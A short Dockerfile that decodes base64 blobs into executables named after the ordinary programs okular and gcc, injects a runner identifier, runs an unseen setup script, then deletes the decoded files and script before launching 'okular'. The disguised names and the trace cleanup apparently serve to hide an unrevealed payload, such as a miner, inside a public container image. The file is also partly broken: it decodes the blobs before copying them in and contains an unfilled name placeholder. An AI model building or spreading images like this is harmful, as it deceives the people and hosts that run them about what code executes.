FROM ubuntu
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > okular.log'

RUN base64 --decode okular.64 > okular
RUN base64 --decode gcc.64 > gcc

RUN chmod +x gcc

COPY okular .
COPY docker.sh .
COPY gcc .

RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' okular
RUN bash ./docker.sh

RUN rm --force --recursive okular _REPO_NAME__.64 docker.sh gcc gcc.64

CMD okular
